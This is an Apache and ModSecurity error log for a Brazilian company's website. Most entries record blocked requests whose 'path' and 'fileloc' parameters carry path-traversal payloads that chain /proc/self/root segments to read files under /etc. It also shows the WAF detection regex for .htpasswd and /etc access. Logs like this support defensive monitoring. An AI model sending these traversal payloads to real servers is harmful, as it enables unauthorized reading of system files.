[Thu Mar 19 02:55:08.815988 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:33910] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuPvNa6ubjKNq_cu4b60gAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:55:10.769919 2026] [core:alert] [pid 17653:tid 140411557287680] [client 57.141.18.13:34494] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 02:55:16.109847 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32826] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:55:16.897476 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:33922] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuPxAkwaGbbGflqUZBxQgAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:55:16.898453 2026] [mime_magic:error] [pid 17887:tid 140411683178240] (70014)End of file found: [client 74.7.241.31:33922] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:55:39.137794 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33308] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:56:01.149858 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33862] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:56:22.487818 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.244.43:55190] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuQBgkwaGbbGflqUZBxeAAAAMU"]
[Thu Mar 19 02:56:23.121819 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34400] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:56:23.741808 2026] [mime_magic:error] [pid 17887:tid 140411683178240] (70014)End of file found: [client 57.141.18.0:36028] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:56:31.493442 2026] [mime_magic:error] [pid 26799:tid 140411733534464] (70014)End of file found: [client 57.141.18.118:36306] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:56:31.581663 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:55526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQD9a6ubjKNq_cu4b7CgAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:56:38.282399 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:52548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQFta6ubjKNq_cu4b7HgAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:56:45.125834 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34886] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:56:58.484800 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.243.128:47368] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQKvu8EFLIOrSqIptbqgAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:57:00.295550 2026] [:error] [pid 27403:tid 140411540502272] [client 74.7.243.128:42312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQLBkFeYa1D6dYQnCr5QAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 02:57:02.891192 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.241.31:33966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQLl_V7PWP6ixUYl57OgAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:57:06.143219 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35332] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:57:18.164211 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.243.128:42322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQPhkFeYa1D6dYQnCr_QAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:57:29.121226 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35772] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:57:42.831825 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:37734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQVuyqAr6etmhZHNojpgAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:57:54.137800 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36338] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:57:55.099193 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.241.31:59498] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQY-yqAr6etmhZHNojwwAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:57:58.476446 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:42490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQZuyqAr6etmhZHNojyQAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:58:01.192697 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:42500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQada6ubjKNq_cu4b7dAAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:58:22.046856 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36952] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:58:24.123884 2026] [mime_magic:error] [pid 31803:tid 140411599251200] (70014)End of file found: [client 57.141.18.55:39150] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:58:26.114726 2026] [:error] [pid 14269:tid 140411691570944] [client 74.7.241.31:42506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQggbLMZ6AikZjR9UcnwAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 02:58:27.564225 2026] [mime_magic:error] [pid 17653:tid 140411616036608] (70014)End of file found: [client 57.141.18.31:39180] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:58:34.045027 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:57088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQigkwaGbbGflqUZBxzgAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 02:58:47.598702 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.228.61:48586] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuQl8df6f5d65gmYZQyKwAAAtc"]
[Thu Mar 19 02:58:49.129840 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:37548] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:58:55.642524 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 57.141.18.75:39932] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 02:59:20.129823 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:38254] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:59:49.091394 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:38898] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 02:59:59.884022 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:42506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQ3wbLMZ6AikZjR9Uc4AAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:00:11.680615 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:38778] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQ6wbLMZ6AikZjR9Uc4wAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:00:19.145470 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39546] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 03:00:23.255624 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:41320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuQ99a6ubjKNq_cu4b7vQAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
